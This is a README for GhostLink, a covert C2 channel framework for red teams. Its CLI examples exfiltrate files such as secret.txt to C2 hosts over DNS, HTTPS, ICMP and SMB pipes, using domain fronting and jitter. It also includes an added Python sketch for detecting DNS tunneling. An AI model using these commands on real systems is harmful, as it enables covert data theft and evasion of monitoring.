Covert C2 Communication and Channel Research Framework
GhostLink is a research framework for studying covert communication channels used in red team operations. It implements various C2 channel techniques including DNS tunneling, HTTPS beaconing, named pipe communication, and steganographic data exfiltration.
Disclaimer: This tool is intended for authorized security research, penetration testing, and educational purposes only. Use of this software against systems without explicit authorization is illegal and unethical. The authors are not responsible for any misuse.
- DNS Tunneling — Encode data in DNS queries/responses (TXT, CNAME, A records, CNAME chaining)
- HTTPS Beaconing — Malleable C2 profiles, domain fronting, configurable jitter
- Named Pipe Channel — Local/remote SMB pipe communication with impersonation and SMB3 encryption
- ICMP Covert Channel — Data hidden in ICMP echo payloads with fragmentation
- Steganographic Encoding — LSB image embedding (BMP) with scatter mode
- Encryption — AES-256-GCM and ChaCha20-Poly1305
- Channel Manager — Multi-channel failover, round-robin, priority-based selection
- Traffic Analysis Resistance — Timing jitter, payload padding, dummy traffic generation
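Seen from the defender's side, the DNS tunneling channel listed above leaves a recognizable trace in resolver logs: many distinct, long, Base32-only labels queried under one parent domain by one client. The following detection sketch is an added example, not part of the GhostLink code base; the log format (`time client qname qtype`), the thresholds, and all function names are assumptions made for illustration.

```python
import base64
import hashlib
import math
import re
from collections import Counter, defaultdict

BASE32_LABEL = re.compile(r"^[a-z2-7]+$")  # RFC 4648 alphabet, lowercased, unpadded

def shannon_entropy(s):
    """Bits per character of the label's empirical character distribution."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def label_is_suspicious(label, min_len=24, min_entropy=3.5):
    """Long, Base32-only, high-entropy label: typical of encoded payload chunks."""
    label = label.lower()
    return (len(label) >= min_len
            and BASE32_LABEL.match(label) is not None
            and shannon_entropy(label) >= min_entropy)

def find_tunnel_candidates(log_lines, min_unique=3):
    """Map (client, parent domain) -> count of distinct suspicious labels, if >= min_unique."""
    seen = defaultdict(set)
    for line in log_lines:
        parts = line.split()
        if len(parts) != 4:  # skip malformed lines
            continue
        _ts, client, qname, _qtype = parts
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) >= 3 and label_is_suspicious(labels[0]):
            seen[(client, ".".join(labels[1:]))].add(labels[0])
    return {key: len(vals) for key, vals in seen.items() if len(vals) >= min_unique}

def sample_log():
    """Constructed log lines (assumed format: time client qname qtype), not real traffic."""
    chunks = [base64.b32encode(hashlib.sha256(b"chunk-%d" % i).digest()[:20]).decode().lower()
              for i in range(4)]
    lines = ["12:00:0%d 10.1.1.20 %s.data.example.com TXT" % (i, c) for i, c in enumerate(chunks)]
    lines += [
        "12:00:05 10.1.1.21 www.example.org A",
        "12:00:06 10.1.1.21 d3b07384d113edec49eaa6238ad5ff00.cdn.example.net A",  # hex, not Base32
        "12:00:07 10.1.1.22 %s.data.example.com TXT" % chunks[0],  # single hit, below threshold
    ]
    return lines

if __name__ == "__main__":
    print(find_tunnel_candidates(sample_log()))
```

Only the client that sent four distinct encoded labels is reported; the hex CDN label and the single-query client are not. The length, entropy, and count thresholds need tuning against a baseline of the environment's normal DNS traffic.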
+---------------------------------------------------+
| CLI / API |
+---------------------------------------------------+
| Channel Manager |
| (Failover, Round-Robin, Random, Least-Latency) |
+---------------------------------------------------+
| Protocol Codec | Encryption Layer |
| (Framing, Compression) | (AES-GCM, ChaCha20) |
+---------------------------------------------------+
| DNS | HTTPS | Named | ICMP | Stego |
| Tunnel | Beacon | Pipe | Covert | Encoding |
+---------------------------------------------------+
| OS Network / IPC Layer |
+---------------------------------------------------+
- CMake 3.16+
- C++17 compiler (MSVC 2019+, GCC 9+, Clang 10+)
- Windows SDK (for CNG crypto and WinHTTP)
```bash
mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
cmake --build . --config Release
```

```bash
cd build
ctest --output-on-failure
```

```bash
ghostlink keygen
```

```bash
# Start listener
ghostlink listen -t dns -d data.example.com --verbose
# Connect and send data
ghostlink connect -t dns -h 8.8.8.8 -d c2.example.com -i payload.bin
```

```bash
# Connect with jitter
ghostlink connect -t https -h c2server.com -p 443 --sleep 30000 --jitter 40
# With domain fronting
ghostlink connect -t https -h cdn.legit.com -p 443 --profile fronting
```

```bash
# Local pipe listener
ghostlink listen -t pipe -n ghostlink_c2
# Remote pipe via SMB
ghostlink connect -t pipe -h 192.168.1.100 -n ghostlink_c2
```

```bash
ghostlink connect -t icmp -h 10.0.0.1 -i secret.txt
```

```bash
ghostlink encode -i secret.txt -o cover.bmp --type stego
```

```bash
ghostlink tunnel -t dns -h resolver.example.com -d tunnel.example.com
```

```bash
ghostlink test --verbose
```

ghostlink/
├── src/
│ ├── core/
│ │ ├── channel.h # Abstract channel interface
│ │ ├── channel_manager.h # Multi-channel orchestration
│ │ ├── channel_manager.cpp
│ │ ├── crypto.h # Encryption layer
│ │ ├── crypto.cpp
│ │ ├── protocol.h # Wire protocol
│ │ └── protocol.cpp
│ ├── channels/
│ │ ├── dns_tunnel.h/.cpp # DNS tunneling
│ │ ├── https_beacon.h/.cpp # HTTPS beaconing
│ │ ├── named_pipe.h/.cpp # Named pipe channel
│ │ └── icmp_channel.h/.cpp # ICMP covert channel
│ ├── encoding/
│ │ ├── base32.h/.cpp # Base32 encoding
│ │ └── steganography.h/.cpp # LSB image encoding
│ ├── utils/
│ │ └── jitter.h/.cpp # Timing jitter utilities
│ └── main.cpp # CLI entry point
├── tests/
│ ├── test_crypto.cpp # Crypto unit tests
│ └── test_dns_encoding.cpp # DNS encoding tests
├── docs/
│ ├── channel-architecture.md
│ └── covert-channels-overview.md
├── CMakeLists.txt
├── LICENSE
└── README.md
- Email: contact@bypasscore.com
- Telegram: @bypasscore
- Web: bypasscore.com
MIT License - see LICENSE for details.